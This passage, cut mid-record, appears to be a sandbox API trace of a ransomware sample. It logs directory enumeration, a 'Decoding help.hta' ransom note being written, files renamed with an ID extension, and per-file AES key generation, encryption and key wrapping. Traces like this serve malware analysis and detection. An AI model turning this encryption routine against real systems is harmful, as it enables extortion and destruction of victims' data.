[0041.225] CloseHandle (hObject=0x3f0) returned 1 [0041.225] FindNextFileW (in: hFindFile=0x5a5d70, lpFindFileData=0xed4fd30 | out: lpFindFileData=0xed4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca64c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcad7040, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcad7040, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", cAlternateFileName="{E6E75~1")) returned 1 [0041.225] lstrcmpW (lpString1=".", lpString2="{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned -1 [0041.225] lstrcmpW (lpString1="..", lpString2="{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned -1 [0041.225] lstrcmpiW (lpString1="windows", lpString2="{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned 1 [0041.227] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" [0041.227] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned 40 [0041.227] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\", lpString2="{e6e75766-da0f-4ba2-9788-6ea593ce702d}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}" [0041.227] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*" [0041.228] GlobalMemoryStatus (in: lpBuffer=0xed4fd10 | out: lpBuffer=0xed4fd10) [0041.228] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x113ac510, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3f0 [0041.233] CloseHandle (hObject=0x3f0) returned 1 [0041.233] FindNextFileW (in: hFindFile=0x5a5d70, lpFindFileData=0xed4fd30 | out: lpFindFileData=0xed4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf93c9960, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf93efac0, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf93efac0, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{f325f05b-f963-4640-a43b-c8a494cdda0f}", cAlternateFileName="{F325F~1")) returned 1 [0041.233] lstrcmpW (lpString1=".", lpString2="{f325f05b-f963-4640-a43b-c8a494cdda0f}") returned -1 [0041.233] lstrcmpW (lpString1="..", lpString2="{f325f05b-f963-4640-a43b-c8a494cdda0f}") returned -1 [0041.233] lstrcmpiW (lpString1="windows", lpString2="{f325f05b-f963-4640-a43b-c8a494cdda0f}") returned 1 [0041.233] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" [0041.233] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned 40 [0041.233] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\", lpString2="{f325f05b-f963-4640-a43b-c8a494cdda0f}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}" [0041.233] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*" [0041.234] GlobalMemoryStatus (in: lpBuffer=0xed4fd10 | out: lpBuffer=0xed4fd10) [0041.234] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5cd84c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3f0 [0041.241] CloseHandle (hObject=0x3f0) returned 1 [0041.241] FindNextFileW (in: hFindFile=0x5a5d70, lpFindFileData=0xed4fd30 | out: lpFindFileData=0xed4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", cAlternateFileName="{F8CFE~1.210")) returned 1 [0041.241] lstrcmpW (lpString1=".", lpString2="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned -1 [0041.241] lstrcmpW (lpString1="..", lpString2="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned -1 [0041.241] lstrcmpiW (lpString1="windows", lpString2="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned 1 [0041.242] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*" [0041.242] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\*.*") returned 40 [0041.242] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\", lpString2="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005" [0041.242] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*.*" [0041.242] GlobalMemoryStatus (in: lpBuffer=0xed4fd10 | out: lpBuffer=0xed4fd10) [0041.242] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x113f4648, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3f0 [0041.249] CloseHandle (hObject=0x3f0) returned 1 [0041.249] FindNextFileW (in: hFindFile=0x5a5d70, lpFindFileData=0xed4fd30 | out: lpFindFileData=0xed4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", cAlternateFileName="{F8CFE~1.210")) returned 0 [0041.952] FindClose (in: hFindFile=0x5a5d70 | out: hFindFile=0x5a5d70) returned 1 Thread: id = 194 os_tid = 0x86c [0043.081] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*.*", lpFindFileData=0xee8fd30 | out: lpFindFileData=0xee8fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 195 os_tid = 0x868 [0040.478] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\*.*", lpFindFileData=0xefcfd30 | out: lpFindFileData=0xefcfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8990 [0042.064] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.064] FindNextFileW (in: hFindFile=0x5d8990, lpFindFileData=0xefcfd30 | out: lpFindFileData=0xefcfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.065] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.065] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.065] FindNextFileW (in: hFindFile=0x5d8990, lpFindFileData=0xefcfd30 | out: lpFindFileData=0xefcfd30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xba6f6d7d, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Server", cAlternateFileName="")) returned 1 [0042.065] lstrcmpW (lpString1=".", lpString2="Server") returned -1 [0042.065] lstrcmpW (lpString1="..", lpString2="Server") returned -1 [0042.065] lstrcmpiW (lpString1="windows", lpString2="Server") returned 1 [0042.065] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\*.*" [0042.065] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\*.*") returned 36 [0042.065] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\", lpString2="Server" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server") returned="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server" [0042.065] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\*.*" [0042.065] GlobalMemoryStatus (in: lpBuffer=0xefcfd10 | out: lpBuffer=0xefcfd10) [0042.065] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x33f8320, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x518 [0042.066] CloseHandle (hObject=0x518) returned 1 [0042.066] FindNextFileW (in: hFindFile=0x5d8990, lpFindFileData=0xefcfd30 | out: lpFindFileData=0xefcfd30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xba6f6d7d, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Server", cAlternateFileName="")) returned 0 [0042.066] FindClose (in: hFindFile=0x5d8990 | out: hFindFile=0x5d8990) returned 1 Thread: id = 196 os_tid = 0x864 [0040.479] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\*.*", lpFindFileData=0xf10fd30 | out: lpFindFileData=0xf10fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a53f0 [0040.480] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.480] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0xf10fd30 | out: lpFindFileData=0xf10fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.480] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.480] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.480] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0xf10fd30 | out: lpFindFileData=0xf10fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.480] lstrcpyW (in: lpString1=0x98a2850, lpString2="\\\\?\\C:\\Users\\Default\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\*.*") returned="\\\\?\\C:\\Users\\Default\\Documents\\*.*" [0040.480] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Documents\\*.*") returned 34 [0040.480] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Default\\Documents\\Decoding help.hta" [0040.480] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\Decoding help.hta" (normalized: "c:\\users\\default\\documents\\decoding help.hta")) returned 0xffffffff [0040.480] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\Decoding help.hta" (normalized: "c:\\users\\default\\documents\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x57c [0042.191] WriteFile (in: hFile=0x57c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xf10fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xf10fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.192] CloseHandle (hObject=0x57c) returned 1 [0042.192] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.193] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0042.193] lstrlenW (lpString="desktop.ini") returned 11 [0042.193] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\*.*") returned="\\\\?\\C:\\Users\\Default\\Documents\\*.*" [0042.193] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Documents\\*.*") returned 34 [0042.193] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini") returned="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini" [0042.193] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini") returned="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini" [0042.193] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0042.193] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini" (normalized: "c:\\users\\default\\documents\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\documents\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\documents\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x57c [0042.194] CreateFileMappingA (hFile=0x57c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x580 [0042.194] CryptAcquireContextA (in: phProv=0xf10fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xf10fcec*=0x33f8338) returned 1 [0047.487] CryptGenKey (in: hProv=0x33f8338, Algid=0x6610, dwFlags=0x1, phKey=0xf10fce8 | out: phKey=0xf10fce8*=0x5db278) returned 1 [0047.487] CryptExportKey (in: hKey=0x5db278, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xf10fbe4, pdwDataLen=0xf10fce4 | out: pbData=0xf10fbe4*, pdwDataLen=0xf10fce4*=0x2c) returned 1 [0047.487] MapViewOfFile (hFileMappingObject=0x580, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x180) returned 0x560000 [0048.242] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xf10fbe4*, pdwDataLen=0xf10fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xf10fbe4*, pdwDataLen=0xf10fcf8*=0x100) returned 1 [0049.196] CryptEncrypt (in: hKey=0x5db278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x560000*, pdwDataLen=0xf10fce4*=0x180, dwBufLen=0x180 | out: pbData=0x560000*, pdwDataLen=0xf10fce4*=0x180) returned 1 [0049.477] UnmapViewOfFile (lpBaseAddress=0x560000) returned 1 [0049.551] CloseHandle (hObject=0x580) returned 1 [0049.551] CryptDestroyKey (hKey=0x5db278) returned 1 [0049.551] CryptReleaseContext (hProv=0x33f8338, dwFlags=0x0) returned 1 [0049.551] SetFilePointerEx (in: hFile=0x57c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0049.551] WriteFile (in: hFile=0x57c, lpBuffer=0xf10fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xf10fcf8, lpOverlapped=0x0 | out: lpBuffer=0xf10fbe4*, lpNumberOfBytesWritten=0xf10fcf8*=0x100, lpOverlapped=0x0) returned 1 [0051.676] WriteFile (in: hFile=0x57c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xf10fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xf10fcf8*=0x500, lpOverlapped=0x0) returned 1 [0051.676] CloseHandle (hObject=0x57c) returned 1 [0051.677] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0055.301] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0xf10fd30 | out: lpFindFileData=0xf10fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0055.301] lstrcmpW (lpString1=".", lpString2="My Music") returned -1 [0055.301] lstrcmpW (lpString1="..", lpString2="My Music") returned -1 [0055.301] lstrcmpiW (lpString1="windows", lpString2="My Music") returned 1 [0055.301] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\*.*") returned="\\\\?\\C:\\Users\\Default\\Documents\\*.*" [0055.301] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Documents\\*.*") returned 34 [0055.301] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\", lpString2="My Music" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Music") returned="\\\\?\\C:\\Users\\Default\\Documents\\My Music" [0055.301] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Music", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\*.*") returned="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\*.*" [0055.301] GlobalMemoryStatus (in: lpBuffer=0xf10fd10 | out: lpBuffer=0xf10fd10) [0055.692] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9a32f30, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x82c [0055.759] CloseHandle (hObject=0x82c) returned 1 [0055.759] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0xf10fd30 | out: lpFindFileData=0xf10fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0055.759] lstrcmpW (lpString1=".", lpString2="My Pictures") returned -1 [0055.759] lstrcmpW (lpString1="..", lpString2="My Pictures") returned -1 [0055.759] lstrcmpiW (lpString1="windows", lpString2="My Pictures") returned 1 [0055.759] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\*.*") returned="\\\\?\\C:\\Users\\Default\\Documents\\*.*" [0055.759] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Documents\\*.*") returned 34 [0055.759] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\", lpString2="My Pictures" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures") returned="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures" [0055.759] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\*.*") returned="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\*.*" [0055.759] GlobalMemoryStatus (in: lpBuffer=0xf10fd10 | out: lpBuffer=0xf10fd10) [0055.759] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10808200, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x82c [0055.774] CloseHandle (hObject=0x82c) returned 1 [0055.774] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0xf10fd30 | out: lpFindFileData=0xf10fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0055.774] lstrcmpW (lpString1=".", lpString2="My Videos") returned -1 [0055.774] lstrcmpW (lpString1="..", lpString2="My Videos") returned -1 [0055.774] lstrcmpiW (lpString1="windows", lpString2="My Videos") returned 1 [0055.777] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\*.*") returned="\\\\?\\C:\\Users\\Default\\Documents\\*.*" [0055.777] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Documents\\*.*") returned 34 [0055.777] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\", lpString2="My Videos" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Videos") returned="\\\\?\\C:\\Users\\Default\\Documents\\My Videos" [0055.777] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Videos", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\*.*") returned="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\*.*" [0055.777] GlobalMemoryStatus (in: lpBuffer=0xf10fd10 | out: lpBuffer=0xf10fd10) [0055.777] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a980b48, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x82c [0055.794] CloseHandle (hObject=0x82c) returned 1 [0055.794] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0xf10fd30 | out: lpFindFileData=0xf10fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, 